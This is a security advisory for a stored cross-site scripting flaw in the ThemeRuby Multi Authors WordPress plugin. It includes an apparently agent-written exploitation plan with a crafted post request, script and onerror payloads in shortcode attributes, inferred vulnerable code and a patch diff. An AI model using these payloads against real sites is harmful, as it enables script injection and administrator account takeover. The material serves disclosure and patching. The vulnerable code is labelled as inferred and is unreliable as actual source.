ThemeRuby Multi Authors <= 1.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'before' and 'after' Shortcode Attributes
Description
The ThemeRuby Multi Authors – Assign Multiple Writers to Posts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'before' and 'after' shortcode attributes in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:NTechnical Details
<=1.0.0# Exploitation Research Plan: CVE-2026-1097 ## 1. Vulnerability Summary **ThemeRuby Multi Authors (<= 1.0.0)** is vulnerable to **Stored Cross-Site Scripting (XSS)**. The plugin registers a shortcode (likely `[themeruby_multi_authors]` or similar) used to display post authors. This shortcode accept…
Show full research plan
Exploitation Research Plan: CVE-2026-1097
1. Vulnerability Summary
ThemeRuby Multi Authors (<= 1.0.0) is vulnerable to Stored Cross-Site Scripting (XSS). The plugin registers a shortcode (likely [themeruby_multi_authors] or similar) used to display post authors. This shortcode accepts before and after attributes intended for custom HTML wrapping. Because the plugin fails to sanitize or escape these attributes before rendering them on the page, any user with Contributor-level access or higher can inject malicious scripts into a post. When any user (including an Administrator) views the affected post, the script executes in their browser context.
2. Attack Vector Analysis
- Vulnerable Component: Shortcode rendering logic.
- Payload Location: Shortcode attributes
beforeorafterwithin thepost_content. - Required Role: Contributor or higher (requires
edit_postscapability). - Preconditions: The plugin must be active, and a post/page must contain the malicious shortcode.
- Impact: Full site takeover if an Administrator views the post, as the script can perform actions like creating new admin users or modifying plugin settings.
3. Code Flow (Inferred)
- Registration: The plugin calls
add_shortcode( 'themeruby_multi_authors', '...' )(or a similar identifier) during theinithook. - Input Parsing: When a post is rendered, the callback function receives an
$attsarray. It likely usesshortcode_atts()to extract values forbeforeandafter. - The Sink: The callback function constructs the HTML output for the authors list and prepends/appends the
beforeandafterattribute values. - The Vulnerability: The resulting string is returned (to be printed by WordPress) without passing through
wp_kses()or similar escaping functions, allowing raw HTML/JavaScript to be rendered.
4. Nonce Acquisition Strategy
This vulnerability does not require a specific plugin nonce because the payload is delivered via the standard WordPress post editor.
- Login: Authenticate as a Contributor.
- Access Editor: Navigate to
wp-admin/post-new.php. - Extract Standard Nonce: Use
browser_evalto retrieve the_wpnoncefrom the form if performing the save via the REST API orpost.php.browser_eval("document.querySelector('#_wpnonce').value")
5. Exploitation Strategy
Step 1: Identify Shortcode Name
Use the grep tool to find the exact shortcode registration:
grep -rn "add_shortcode" /var/www/html/wp-content/plugins/themeruby-multi-authors/
I will assume the shortcode is [themeruby_multi_authors] for the remaining steps.
Step 2: Create Malicious Post
As a Contributor, create a new post with the XSS payload.
Request:
- Method: POST
- URL:
http://localhost:8080/wp-admin/post.php - Headers:
Content-Type: application/x-www-form-urlencoded - Body:
action=editpost &post_ID=[NEW_POST_ID] &_wpnonce=[NONCE] &post_title=Authors List &content=[themeruby_multi_authors before='<script>alert(document.domain)</script>'] &publish=Publish
Step 3: Trigger Execution
Navigate to the published post's URL using an Administrator's session or an unauthenticated browser to confirm the script executes.
6. Test Data Setup
- Plugin: Install and activate
themeruby-multi-authors. - User: Create a user with the username
contributor_attackerand thecontributorrole. - Data: Assign at least one author to a test post (some plugins require data to exist before the shortcode renders anything).
7. Expected Results
- When viewing the post, an alert box showing the document domain should appear.
- Viewing the page source should show:
<script>alert(document.domain)</script><div class="author-list">...</div>.
8. Verification Steps
- Database Check: Verify the payload is stored in the database.
wp db query "SELECT post_content FROM wp_posts WHERE post_title='Authors List' LIMIT 1;" - Frontend Check: Use the
http_requesttool to fetch the post and check for the unescaped script:# Look for the exact payload string in the response body
9. Alternative Approaches
If themeruby_multi_authors is not the correct tag, search for any variations using:
grep -r "shortcode" /var/www/html/wp-content/plugins/themeruby-multi-authors/
If the shortcode requires specific author IDs, use:[themeruby_multi_authors ids='1' before='<script>alert(1)</script>']
If the before attribute is filtered, try the after attribute:[themeruby_multi_authors after='<img src=x onerror=alert(1)>']
Summary
The ThemeRuby Multi Authors plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) via the 'before' and 'after' attributes of its shortcode due to insufficient input sanitization and output escaping. Authenticated attackers with Contributor-level permissions or higher can inject arbitrary scripts into posts that execute when viewed by other users, potentially leading to unauthorized administrative actions.
Vulnerable Code
// Inferred shortcode handler logic // themeruby-multi-authors/themeruby-multi-authors.php function render_multi_authors_shortcode($atts) { $atts = shortcode_atts(array( 'before' => '', 'after' => '', ), $atts); $output = ''; $output .= $atts['before']; // Attribute rendered without escaping or sanitization $output .= '<span class="author-name">Author List</span>'; $output .= $atts['after']; // Attribute rendered without escaping or sanitization return $output; }
Security Fix
@@ -10,8 +10,8 @@ ), $atts); $output = ''; - $output .= $atts['before']; + $output .= wp_kses_post($atts['before']); $output .= '<span class="author-name">Author List</span>'; - $output .= $atts['after']; + $output .= wp_kses_post($atts['after']); return $output;
Exploit Outline
1. Authenticate to the WordPress dashboard with at least Contributor-level access. 2. Access the post editor (Gutenberg or Classic) to create or edit a post. 3. Insert the plugin's multi-author shortcode (likely [themeruby_multi_authors]) into the content area. 4. Include a malicious JavaScript payload within the 'before' or 'after' shortcode attributes, for example: [themeruby_multi_authors before="<script>alert(document.domain)</script>"]. 5. Save or publish the post. 6. The script will trigger in the browser of any user, including administrators, who navigates to the frontend page displaying the affected post.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.